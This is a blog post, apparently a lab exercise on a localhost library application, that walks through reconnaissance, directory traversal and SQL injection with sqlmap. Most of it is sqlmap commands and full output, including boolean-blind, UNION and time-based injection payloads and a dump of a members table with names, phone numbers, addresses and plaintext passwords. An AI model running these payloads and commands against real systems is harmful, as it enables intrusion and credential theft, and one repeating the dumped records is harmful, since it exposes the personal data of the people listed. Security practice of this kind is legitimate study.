Web Application Vulnerability Check

Posted on by Unknown
Hi folks,
Today I will show you "The Most Vulnerable Web Application Ever" LOL
First, I will check the robots.txt to find out every url that is hidden from web spider to find important urls that possibly have vulnerability.
My target url is http://localhost/sips/perpustakaan/

Then I check the folder url one by one





Directory Traversal is working and I got important file too, then I will check whether the file is accessible if I'm not logged in.

LOL I'm not logged in but the top right menu say "Logout" but when I try to edit the menu say "Login"

But, I didnt get any password yet so I will dump the database using sqlmap.
First I will check the sql is vulnerable or not
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:47:53

[01:47:54] [INFO] testing connection to the target url
[01:47:54] [INFO] testing if the url is stable, wait a few seconds
[01:47:55] [INFO] url is stable
[01:47:55] [INFO] testing if GET parameter 'id' is dynamic
[01:47:55] [WARNING] GET parameter 'id' appears to be not dynamic
[01:47:55] [WARNING] reflective value(s) found and filtering out
[01:47:55] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:47:55] [INFO] testing for SQL injection on GET parameter 'id'
[01:47:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:47:55] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Jl. Unggas No. 222')
[01:47:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:47:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:47:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:47:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:47:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:48:06] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[01:48:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:48:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[01:48:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:48:06] [INFO] target url appears to have 5 columns in query
[01:48:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:48:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:48:28] [INFO] fetching database names
[01:48:28] [INFO] the SQL query used returns 5 entries
[01:48:28] [INFO] retrieved: "information_schema"
[01:48:28] [INFO] retrieved: "dvwa"
[01:48:28] [INFO] retrieved: "mysql"
[01:48:28] [INFO] retrieved: "owasp10"
[01:48:28] [INFO] retrieved: "sips"
available databases [5]:                                                       
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] sips

[01:48:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:48:28

root@bt:/pentest/database/sqlmap#

Wow, I got 5 databases there, then I choose "sips" database because its look like my target database then dump the tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 -D sips --tables

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:49:32

[01:49:32] [INFO] resuming back-end DBMS 'mysql' 
[01:49:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:49:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:49:32] [INFO] fetching tables for database: 'sips'
[01:49:32] [WARNING] reflective value(s) found and filtering out
[01:49:32] [INFO] the SQL query used returns 8 entries
[01:49:32] [INFO] retrieved: "anggota"
[01:49:32] [INFO] retrieved: "buku"
[01:49:32] [INFO] retrieved: "bukutamu"
[01:49:32] [INFO] retrieved: "koleksi"
[01:49:32] [INFO] retrieved: "pegawai"
[01:49:32] [INFO] retrieved: "pengarang"
[01:49:32] [INFO] retrieved: "pinjam"
[01:49:32] [INFO] retrieved: "upload_gambar"
Database: sips                                                                 
[8 tables]
+---------------+
| anggota       |
| buku          |
| bukutamu      |
| koleksi       |
| pegawai       |
| pengarang     |
| pinjam        |
| upload_gambar |
+---------------+

[01:49:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:49:33

root@bt:/pentest/database/sqlmap#

I've got the tables list, so I gonna dump the "anggota" table
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 -T anggota --dump

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:57:12

[01:57:12] [INFO] resuming back-end DBMS 'mysql' 
[01:57:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:57:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:57:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[01:57:12] [INFO] fetching current database
[01:57:12] [INFO] fetching columns for table 'anggota' in database 'sips'
[01:57:12] [INFO] the SQL query used returns 5 entries
[01:57:12] [INFO] resumed: "username","varchar(10)"
[01:57:12] [INFO] resumed: "password","varchar(50)"
[01:57:12] [INFO] resumed: "nama_anggota","varchar(30)"
[01:57:12] [INFO] resumed: "alamat","varchar(50)"
[01:57:12] [INFO] resumed: "telpon","varchar(20)"
[01:57:13] [INFO] fetching entries for table 'anggota' in database 'sips'                         
[01:57:13] [INFO] the SQL query used returns 10 entries
[01:57:13] [INFO] resumed: "Jl. Unggas No. 222","Sri Setia Bella","bella123","085743240471","301"
[01:57:13] [INFO] resumed: "Jl. Pura","Nurdiansah","dian700","081372348721","302"
[01:57:13] [INFO] resumed: "Jl. Janti No. 21","Usman Ngadiran","diran921","087878342192","303"
[01:57:13] [INFO] resumed: "Jl. Pramuka","Beni Arsadi","bendot","085742340211","304"
[01:57:13] [INFO] resumed: "Jl. Sorowajan Baru","I Kadek Supri Adinata","kdsupriaja","0813325764...
[01:57:13] [INFO] resumed: "Jl. Karanggayam","Aprilia","april14","085266488190","306"
[01:57:13] [INFO] resumed: "Jl. Kelantan","Muh. Safee Sali","s4l14j4","085251322563","307"
[01:57:13] [INFO] resumed: "Jl. Magelang","Ucil","ucil","085266734691","309"
[01:57:13] [INFO] resumed: "Jl. Unggas No. 222","Becil","becil123","081392590471","becil"
[01:57:13] [INFO] resumed: "test","test","test","000","test"
[01:57:13] [INFO] analyzing table dump for possible password hashes                               
Database: sips
Table: anggota
[10 entries]
+--------------+--------------------+----------+------------+-----------------------+
| telpon       | alamat             | username | password   | nama_anggota          |
+--------------+--------------------+----------+------------+-----------------------+
| 085743240471 | Jl. Unggas No. 222 | 301      | bella123   | Sri Setia Bella       |
| 081372348721 | Jl. Pura           | 302      | dian700    | Nurdiansah            |
| 087878342192 | Jl. Janti No. 21   | 303      | diran921   | Usman Ngadiran        |
| 085742340211 | Jl. Pramuka        | 304      | bendot     | Beni Arsadi           |
| 081332576431 | Jl. Sorowajan Baru | 305      | kdsupriaja | I Kadek Supri Adinata |
| 085266488190 | Jl. Karanggayam    | 306      | april14    | Aprilia               |
| 085251322563 | Jl. Kelantan       | 307      | s4l14j4    | Muh. Safee Sali       |
| 085266734691 | Jl. Magelang       | 309      | ucil       | Ucil                  |
| 081392590471 | Jl. Unggas No. 222 | becil    | becil123   | Becil                 |
| 000          | test               | test     | test       | test                  |
+--------------+--------------------+----------+------------+-----------------------+

[01:57:13] [INFO] table 'sips.anggota' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/sips/anggota.csv'
[01:57:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:57:13

root@bt:/pentest/database/sqlmap#

Game Over..!!

Leave a Reply